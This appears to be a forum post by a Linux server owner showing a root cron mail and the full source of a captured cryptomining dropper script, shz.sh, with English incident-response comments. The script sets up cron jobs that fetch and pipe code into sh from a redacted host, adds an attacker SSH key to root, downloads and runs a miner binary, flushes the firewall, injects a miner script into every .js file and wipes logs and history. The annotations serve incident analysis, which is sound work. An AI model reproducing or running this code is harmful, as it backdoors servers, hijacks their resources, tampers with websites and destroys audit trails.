如下的命令
[root@azimiao ~]# systemctl start firewalld.service
You have new mail in /var/spool/mail/root
然后进入 mail 这个文件夹,查看 root 这个文件的内容
From root@azimiao.localdomain Tue Nov 27 08:53:28 2018
Return-Path: <root@azimiao.localdomain>
X-Original-To: root
Delivered-To: root@azimiao.localdomain
Received: by azimiao.localdomain (Postfix, from userid 0)
id A091C2409; Tue, 27 Nov 2018 08:53:28 +0800 (CST)
From: "(Cron Daemon)" <root@azimiao.localdomain>
To: root@azimiao.localdomain
Subject: Cron <root@azimiao> url -fsSL xxxxxxxxxxx/shz.sh | sh
Content-Type: text/plain; charset=UTF-8
Auto-Submitted: auto-generated
Precedence: bulk
X-Cron-Env: <XDG_SESSION_ID=50357>
X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0>
X-Cron-Env: <LANG=en_US.UTF-8>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <20181127005328.A091C2409@azimiao.localdomain>
Date: Tue, 27 Nov 2018 08:52:06 +0800 (CST)
sh: line 2: dev/null: No such file or directory
mv: cannot stat ‘/usr/bin/wget’: No such file or directory
mv: cannot stat ‘/usr/bin/curl’: No such file or directory
ok
chattr: No such file or directory while trying to stat REDIS0008ú
chattr: No such file or directory while trying to stat redis-ver^E4.0.2ú
chattr: No such file or directory while trying to stat redis-bitsÀ@ú^EctimeÂTlô[ú^Hused-mem ô^Lú^Nrepl-stream-dbÀÿú^Grepl-id(da32fed1ca9684ea57cb075d10627ec992da4e86ú^Krepl-offsetÀú^Laof-preambleÀþû
chattr: No such file or directory while trying to stat ^Aa^Ab
发现有个脚本,点击能下载,脚本内容如下
#!/bin/sh
# ---------------------------------------------------------------------------
# Malware sample as captured on the page: the dropper that the cron entry
# "url -fsSL .../shz.sh | sh" (see the cron mail above) fetches and pipes
# into sh.  The comments are incident-response annotations only: what each
# stage touches on the host and what to look for when cleaning up.
# Note: the file uses bash-only `[[ ... =~ ... ]]` under a /bin/sh shebang.
# ---------------------------------------------------------------------------

# Stage 1: weaken the host.  Puts SELinux in permissive mode and rewrites
# /etc/sysconfig/selinux with the literal line shown below (the misspelled
# value is itself a usable IoC).  `2>dev/null` (no leading slash) is what
# produces the "sh: line 2: dev/null: No such file or directory" line in the
# cron mail above.
setenforce 0 2>dev/null
echo SELINUX=desabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
# Snapshot the current user's crontab and root's authorized_keys.  Both are
# used further down as "already installed?" checks, so they are also the
# first two places to inspect on a suspect host.
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
# /etc/gmbpr2 is a marker file: if it exists the /etc code path below is
# taken (root with a writable /etc); otherwise the /tmp path is used.
# /etc/gmbpr marks an older variant, which is removed first.
echo 1 > /etc/gmbpr2
rtdir="/etc/gmbpr2"
oddir="/etc/gmbpr"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/url"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/get"
# Renames curl -> url and wget -> get.  This is why the cron subject reads
# "url -fsSL" and why the mail shows "mv: cannot stat '/usr/bin/wget'" (the
# binaries were already renamed by an earlier run).  Remediation: move
# /usr/bin/url and /usr/bin/get back to their original names and expect any
# tooling that relied on curl/wget to have failed in the meantime.
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/curl /usr/bin/url
# Removes the previous variant (zjgw process, shz.sh copies, old marker).
if [ -f "$oddir" ]
then
pkill zjgw
chattr -i /etc/shz.sh
rm -f /etc/shz.sh
chattr -i /tmp/shz.sh
rm -f /tmp/shz.sh
chattr -i /etc/gmbpr
rm -f /etc/gmbpr
else
echo "ok"
fi
# ---- /etc code path (marker /etc/gmbpr2 present) ---------------------------
if [ -f "$rtdir" ]
then
echo "goto 1" >> /etc/gmbpr2
# $cont holds the *contents* of the crontab file and is expanded unquoted, so
# every word of it is handed to chattr as a filename.  In the mail above
# those words are Redis RDB fragments (REDIS0008, redis-ver 4.0.2, repl-id
# ...), i.e. the crontab file itself was a Redis dump.  NOTE(review): that is
# consistent with initial access through an exposed, unauthenticated Redis
# instance writing its dump into /var/spool/cron -- inferred from the mail
# output; confirm by checking whether Redis on this host is reachable
# without authentication.
chattr -i $cont
# Persistence: re-fetch and run this script every 12 min (curl present) or
# 15 min (renamed "url") unless "shz.sh" already appears in the crontab.
# Remediation: delete the entry from /var/spool/cron/<user> after this
# script's immutable-flag handling below has been undone.
if [ -f "$bbdir" ]
then
[[ $cont =~ "shz.sh" ]] || echo "*/12 * * * * curl -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir}
else
[[ $cont =~ "shz.sh" ]] || echo "*/15 * * * * url -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir}
fi
# Backdoor: appends the attacker's SSH public key (key comment
# "Administrator@Guess_me") to root's authorized_keys.  "xvsRtqHLMWoh" is a
# substring of that key and serves as the "already present" check.
# Remediation: remove this key (and any other unrecognised key) from
# /root/.ssh/authorized_keys and treat root SSH access as having been granted.
mkdir /root/.ssh
[[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 700 /root/.ssh/
[[ $ssht =~ "xvsRtqHLMWoh" ]] || echo >> /root/.ssh/authorized_keys
[[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 600 /root/.ssh/authorized_keys
[[ $ssht =~ "xvsRtqHLMWoh" ]] || echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUzgX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd1wGz+QSHEd Administrator@Guess_me" >> /root/.ssh/authorized_keys
# Payload: /etc/zigw.  If no "zigw" process is running, the file is
# (re)downloaded unless it already exists with the expected size 1467080
# bytes, then made world-writable and executed from /etc.  NOTE(review): the
# "stratum" process kills and mining-pool ports further down suggest zigw is
# a coin miner; that is inferred from those strings, not from the binary.
ps -fe|grep zigw |grep -v grep
if [ $? -ne 0 ]
then
cd /etc
filesize=`ls -l zigw | awk '{ print $5 }'`
file="/etc/zigw"
if [ -f "$file" ]
then
if [ "$filesize" -ne "1467080" ]
then
chattr -i /etc/zigw
rm -f zigw
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /etc/zigw
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /etc/zigw
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/zigw
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=10 -P /etc xxxxxxxxxx/zigw
fi
fi
else
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /etc/zigw
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 10 xxxxxxxxxx > /etc/zigw
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=10 -P xxxxxxxxxx:43768/zigw
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/zigw
fi
fi
chmod 777 zigw
sleep 1s
./zigw
else
echo "runing....."
fi
# Both the payload and this script are made world-writable and then
# immutable; `rm` fails on them until `chattr -i` has been run.
chmod 777 /etc/zigw
chattr +i /etc/zigw
chmod 777 /etc/shz.sh
chattr +i /etc/shz.sh
# Keeps a local copy of this script at /etc/shz.sh and runs it if it was
# missing (so the cron job keeps working even if the download host goes away).
shdir='/etc/shz.sh'
if [ -f "$shdir" ]
then
echo "exists shell"
else
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /etc/shz.sh
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /etc/shz.sh
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/shz.sh
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/shz.sh
fi
sh /etc/shz.sh
fi
# ---- /tmp code path (marker could not be written to /etc) ------------------
# Same logic as above with /tmp in place of /etc: marker /tmp/gmbpr2, cron
# entry every 10 min, payload /tmp/zigw, script copy /tmp/shz.sh.  Check
# both locations during clean-up.
else
echo "goto 1" > /tmp/gmbpr2
chattr -i $cont
if [ -f "$bbdir" ]
then
[[ $cont =~ "shz.sh" ]] || echo "*/10 * * * * curl -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir}
else
[[ $cont =~ "shz.sh" ]] || echo "*/10 * * * * url -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir}
fi
ps -fe|grep zigw |grep -v grep
if [ $? -ne 0 ]
then
cd /tmp
filesize=`ls -l zigw | awk '{ print $5 }'`
file="/tmp/zigw"
if [ -f "$file" ]
then
if [ "$filesize" -ne "1467080" ]
then
chattr -i /tmp/zigw
rm -f zigw
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw
fi
fi
else
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw
fi
fi
chmod 777 zigw
sleep 1s
./zigw
else
echo "runing....."
fi
chmod 777 /tmp/zigw
chattr +i /tmp/zigw
chmod 777 /tmp/shz.sh
chattr +i /tmp/shz.sh
shdir='/tmp/shz.sh'
if [ -f "$shdir" ]
then
echo "exists shell"
else
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /tmp/shz.sh
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /tmp/shz.sh
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/shz.sh
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=10 -P /tmp xxxxxxxxxxm:43768/shz.sh
fi
sh /tmp/shz.sh
fi
fi
# Stage 3: evict competitors.  Flushes every iptables rule and chain (the
# host's own firewall policy is gone after this) and adds OUTPUT drops for
# TCP 3333/5555/7777/9999/14444.  Treat the host firewall state as unknown
# during clean-up and restore it from configuration, not from memory.
iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -A OUTPUT -p tcp --dport 14444 -j DROP
iptables-save
service iptables reload
# Kills any process whose command line contains "stratum" and any process
# with a connection involving the listed ports.  The port grep is a plain
# substring match on netstat output, so unrelated processes using those
# ports are killed as well.
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
netstat -ano|grep :3333|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :4444|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :5555|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :6666|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :7777|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :3347|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :14444|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :14443|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
# Stage 4: web-content tampering.  Every *.js file on the whole filesystem
# that does not already contain "f4ce9" gets a <script> tag appended that
# loads a remote script and calls OMINEId("e02cf4ce91284dab9bc3fc4cc2a65e28",
# "-1") -- i.e. a browser-side miner is injected into any site served from
# this host.  IR: search web roots and installed packages for "OMINEId" or
# that key, and restore affected JS from source control / package files
# rather than editing in place.
find / -name '*.js'|xargs grep -L f4ce9|xargs sed -i '$a\document.write\('\'\<script\ src=\"xxxxxxxxxxxxxxx"\>\</script\>\<script\>OMINEId\(\"e02cf4ce91284dab9bc3fc4cc2a65e28\",\"-1\"\)\</script\>\'\)\;
# Stage 5: anti-forensics.  Clears shell history, root's mail spool, wtmp,
# /var/log/secure and .bash_history, so local login/auth logs after the first
# run are unreliable; rely on remote syslog or other hosts' records instead.
# NOTE(review): the cron mail above presumably survives because cron
# delivers a job's output only after the job -- and this truncation -- has
# finished.
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
echo > /var/spool/mail/root
(发帖时提示不能使用短网址,莫名其妙,所以我用 xxx 代替了)